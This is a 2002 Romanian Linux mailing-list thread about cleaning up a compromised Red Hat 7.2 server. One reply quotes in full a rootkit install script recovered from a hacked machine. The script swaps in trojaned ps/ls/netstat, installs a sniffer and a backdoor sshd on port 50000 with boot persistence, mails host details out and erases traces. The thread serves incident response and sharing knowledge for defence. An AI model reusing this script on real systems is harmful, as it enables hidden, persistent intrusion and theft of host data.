2 mbps cu abuse.zone.ro sa zicem.. /me
At 01:08 PM 5/25/02 -0700, you wrote: >Hello paul, > >Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are >rootkituri sariti cu emailurile unde se duc info despre server. Asha >mai scapam de ei oleak:) > >Gushterul >P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk acolo ci >info sha shthie homu' lha khare sha hai dhea in khap. Reformulez cine >face hosting? :) > >Friday, May 24, 2002, 11:38:02 PM, you wrote: > >pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la rh >network si >pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru >pzeur> update-uri la zi. Seamana a wingoz dar merge bine. >pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe care le >pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de updateuri) >pzeur> cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) >aduci >pzeur> de acolo pachetele corespunzatoare headerelor pe care le pui in >pzeur> /var/spool/up2date si repornesti "up2date -u". > > >pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt >sistem >pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date >-u" cu >pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu >mergeau. >pzeur> asa ca am adus repede respectivele app de pe alt sistem, si surpriza... >pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin directoare >pzeur> si am gasit in /var/ftp/ un director care nu era acolo ultima data >cind m-am >pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva director de >pzeur> librarii unde era cam asa ceva: >pzeur> . >pzeur> .. >pzeur> .lib >pzeur> .tooz > >pzeur> in .tooz era fisierul install: >pzeur> #private version from cur / not hacked by lamme assz as Em|nem or >others! >pzeur> #phear my reverge all u mother fuckers >pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun >pzeur> #!/bin/sh >pzeur> unset HISTFILE >pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ >pzeur> chattr -iau /bin/ps >pzeur> chattr -iau /bin/ls >pzeur> chattr -iau /bin/netstat >pzeur> chattr -iau /bin/lpd >pzeur> rm -rf /etc/ssh* >pzeur> clear >pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib >sh sysinfo1 >> new-host >pzeur> sh ssh_random_key >pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ >pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ >pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ >pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps >pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls >pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc >pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr >pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file >pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps >pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls >pzeur> mv ps /bin/ps >pzeur> mv ls /bin/ls >pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ >pzeur> mv netstat /bin/netstat >pzeur> chown root.root /bin/ls >pzeur> chown root.root /bin/ps >pzeur> chown root.root /bin/netstat >pzeur> mv linsniffer /bin/lpd >pzeur> rm -rf /etc/ssh* >pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 >pzeur> rm -rf /usr/sbin/rpc.rstatd >pzeur> rm -rf /usr/sbin/rpc* >pzeur> lpd & >pzeur> ./lpd >pzeur> mv sshd /bin/nfsd >pzeur> mv -f sshd_config /etc/ >pzeur> mv -f ssh_host_key /etc/ >pzeur> mv -f ssh_random_seed /etc/ >pzeur> mv -f ssh_host_key.pub /etc/ >pzeur> rm -rf ssh_random_key >pzeur> chattr +iau /bin/nfsd >pzeur> chattr +iau /etc/sshd_config >pzeur> chattr +iau /etc/ssh_host_key >pzeur> chattr +iau /etc/ssh_random_seed >pzeur> chattr +iau /etc/ssh_host_key.pub >pzeur> nfsd -q -p 50000 >pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit >pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet >./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] >pzeur> cat new-host |mail -s >pzeur> #-----done with ssh---- >pzeur> killall -9 portmap >pzeur> killall rpc.statd >pzeur> rm -f /usr/sbin/rpc.statd >echo "ftp">>>/etc/ftpusers >echo "root">>>/etc/ftpusers >pzeur> cat /proc/cpuinfo >pzeur> mv pwd /dev/capi20.20 >pzeur> rm -f sysinfo1 >pzeur> rm -f sysinfo >pzeur> rm -f new-host >pzeur> rm -f sshd >pzeur> cd .. >pzeur> rm -rf s.tgz >pzeur> clear >pzeur> echo "****************************7.1***************************" >pzeur> echo "Oki" >pzeur> echo "***********************SpUrKaTu&TrUnKS********************" > > >pzeur> mai era un fisier .1addr: >pzeur> 2 194.105 >pzeur> 3 6666 >pzeur> 3 6667 >pzeur> 3 54789 >pzeur> 3 31337 >pzeur> 3 6668 >pzeur> 3 6669 >pzeur> 3 6666 >pzeur> 2 194.102.233 >pzeur> 2 209.142.209.161 >pzeur> 2 217.10 >pzeur> 2 213.233 > > >pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai sunt >printre ele : >pzeur> hideps install lpd sense string tcp.log utils wipe >pzeur> .1addr .1file .1proc .ls netstat .ps > >pzeur> cam asta ma mai gasit > >pzeur> in general e bine ai copii originale dupa ls, ps, netstat > >pzeur> bafta > > >pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: > > >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. > >> Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. > >> 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu > >> rpm -U --force ... > >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese > >> ascunse: > >> - You have 1 process hidden for readdir command > >> - You have 1 process hidden for ps command > >> 3. chkrootkit "intepeneste" la verificare la pozitia > >> Checking 'aliens'... > >> 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr > >> --> Illegal seek > >> 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware > >> si nu stiu ce... si ca asculta pe portul 7000 > >> 6. In boot.log apare linia > >> ... Starting backdoor daemon... Done, pid=... > >> Acum va intreb: > >> - mai pot fi si alte pachete compromise in afara de cele numite? > >> - ce este cu acele procese ascunse si cum scap de ele? > >> - de ce intepeneste chkrootkit? > >> - daca este intr-adevar vorba de backdoor, cum scap de el? > >> > >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc > >> anticipat pentru ajutor. > >> Gaby > >> > >> > >> --- > >> Pentru dezabonare, trimiteti mail la > >> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > >> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > >> > >> > >pzeur> --- >pzeur> Pentru dezabonare, trimiteti mail la >pzeur> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. >pzeur> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > > >-- >Best regards, > Gushterul mailto:[EMAIL PROTECTED] > >--- >Pentru dezabonare, trimiteti mail la >[EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. >REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
